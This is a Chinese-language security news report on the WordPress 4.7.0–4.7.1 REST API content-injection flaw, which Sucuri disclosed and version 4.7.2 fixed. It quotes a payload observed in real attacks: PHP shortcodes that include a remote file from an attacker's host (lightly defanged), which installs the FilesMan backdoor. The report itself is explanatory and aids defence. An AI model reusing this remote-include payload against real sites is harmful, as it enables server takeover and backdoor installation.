近期攻击者发现了一种利用WordPress REST API漏洞的方法,并通过安装隐藏的后门来获得对受害者服务器的完全访问。
1月26日,WordPress团队发布了WordPress 4.7.2,其中包含一个解决WordPress REST API中的漏洞的秘密修复,影响到REST API——来自Sucuri的安全研究人员最先发现该漏洞。未经授权的攻击者利用该漏洞可注入恶意内容,以及进行提权,对文章、页面等内容进行修改。REST API是最近添加到WordPress 4.7.0并默认启用的。
漏洞发现者Sucuri介绍,这个缺陷影响WordPress 4.7.0和4.7.1,并允许攻击者制作恶意HTTP请求,当发送到一个WordPress网站将允许黑客绕过身份验证方法,并更改博客帖子的标题和内容和静态 页面。
简单来说,攻击者发现了通过REST API缺陷将自己的PHP代码发送到WordPress站点的方法,直到那时它才被用于改变原有的文本。
content:"[insert_php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/insert_php]
[php] include('http[:]//acommeamour.fr/tmp/xx.php'); [/php]",
"id":"61a"}
在实时攻击中看到的上述源代码片段将告诉WordPress引擎在每次用户访问该特定页面时执行以下PHP命令,如果黑客插入木马或其他恶意脚本,影响将会扩大。
include('http[:]//acommeamour.fr/tmp/xx.php');
这行PHP代码将在受害者的站点上包含一个远程PHP文件,它将在WordPress / wp-content / uploads /文件夹中下载并安装FilesMan PHP后门。
在将其HTTP请求发送到站点的WordPress REST API后,攻击者只需访问一次损坏的页面,然后访问后门并接管受害者的底层服务器。
鉴于WordPress使用的广泛性,该漏洞的影响还是比较大的。使用 WordPress REST API 是简便高效的通过 JSON 格式传输数据访问或控制 WordPress 站点内容的方法。API 提供了对用户、文章、分类等不同功能的控制,也可以通过 API 检索或修改文章。Wordpress REST API 插件在 4.70 集成到 WordPress 中,由于权限控制失效导致内容注入或修改。WordPress开发团队已经与Sucuri配合在最新的4.7.2版本中修复了该漏洞。